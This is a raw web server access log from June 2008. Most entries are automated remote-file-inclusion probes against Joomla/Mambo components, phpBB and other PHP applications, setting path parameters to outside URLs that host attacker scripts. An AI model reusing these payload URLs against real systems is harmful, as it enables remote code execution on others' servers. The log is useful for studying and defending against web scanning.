74.55.68.38 - - [24/Jun/2008:12:10:09 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:10:13 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:10:13 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:10:14 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:10:14 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:10:14 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:10:23 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:10:23 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:10:23 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:10:23 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:12:10:24 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:10:40 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
62.58.108.200 - - [24/Jun/2008:12:11:06 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:12:11:22 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.12.244.192 - - [24/Jun/2008:12:11:26 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:12:11:26 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:12:11:26 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:12:11:26 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.135.118 - - [24/Jun/2008:12:11:32 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [24/Jun/2008:12:11:32 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.58.164 - - [24/Jun/2008:12:11:45 -0700] "GET /logs/access_080117.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:12:00 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:12:01 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:12:33 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:12:33 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:12:36 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:12:36 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.189 - - [24/Jun/2008:12:12:41 -0700] "GET /logs/access_071225.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.47.9.2 - - [24/Jun/2008:12:13:46 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [24/Jun/2008:12:13:47 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [24/Jun/2008:12:13:48 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:12:14:12 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:12:14:16 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:12:14:20 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.31.70.251 - - [24/Jun/2008:12:14:34 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.70.251 - - [24/Jun/2008:12:14:34 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:14:35 -0700] "GET /logs/access_080127.log/index1.php?=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:14:35 -0700] "GET /index1.php?=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:14:36 -0700] "GET /logs/index1.php?=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:12:15:15 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:12:15:15 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.58.189 - - [24/Jun/2008:12:15:18 -0700] "GET / HTTP/1.0" 500 358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.81.57.135 - - [24/Jun/2008:12:15:30 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://humanity.kru.ac.th/appserv/xvf.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.81.57.135 - - [24/Jun/2008:12:15:33 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://humanity.kru.ac.th/appserv/xvf.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.57.137.51 - - [24/Jun/2008:12:16:02 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.57.137.51 - - [24/Jun/2008:12:16:03 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
202.57.137.51 - - [24/Jun/2008:12:16:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.218.234.146 - - [24/Jun/2008:12:16:19 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [24/Jun/2008:12:16:19 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.51.131.109 - - [24/Jun/2008:12:16:38 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:12:16:59 -0700] "GET /logs/access.log/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:12:17:05 -0700] "GET /logs/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:12:17:20 -0700] "GET /index.php?url=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 500 374 "-" "libwww-perl/5.810" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:17:29 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:18:12 -0700] "GET /logs/access_080325.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:12:18:45 -0700] "GET /logs/access_080118.log/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:12:19:05 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:12:19:15 -0700] "GET //index.php?lang=en&page=http://death32.com/mc??? HTTP/1.1" 500 374 "-" "libwww-perl/5.808" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:19:25 -0700] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:19:25 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:19:25 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.101.24 - - [24/Jun/2008:12:19:30 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [24/Jun/2008:12:19:30 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:19:34 -0700] "GET /logs/access_080321.log//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:19:35 -0700] "GET /logs/access_080321.log//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:19:44 -0700] "GET /logs/access_071224.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:19:45 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:19:45 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:12:19:51 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:12:19:52 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:12:19:53 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:20:28 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:12:20:28 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:20:31 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:20:31 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:20:31 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:12:21:03 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.107.121.154 - - [24/Jun/2008:12:21:05 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.107.121.154 - - [24/Jun/2008:12:21:06 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
220.107.121.154 - - [24/Jun/2008:12:21:06 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:12:21:09 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:21:41 -0700] "GET /db.php?path_local=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:23:05 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:23:05 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:23:05 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:12:23:09 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:12:23:09 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:12:23:09 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:12:23:09 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:23:19 -0700] "GET /logs/access_080312.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:23:57 -0700] "GET /index.php?pagina=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.808" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:23:58 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:23:58 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:23:59 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
196.41.130.144 - - [24/Jun/2008:12:24:31 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.76" "www.dmulk.com"
196.41.130.144 - - [24/Jun/2008:12:24:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:24:45 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:24:45 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:24:45 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:24:58 -0700] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:24:58 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:24:58 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [24/Jun/2008:12:25:09 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [24/Jun/2008:12:25:14 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:25:29 -0700] "GET /logs/access_080127.log/scanhttp://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:25:30 -0700] "GET /scanhttp://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:25:30 -0700] "GET /logs/scanhttp://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:12:25:38 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:25:48 -0700] "GET /logs/access.log//port.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:25:48 -0700] "GET //port.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
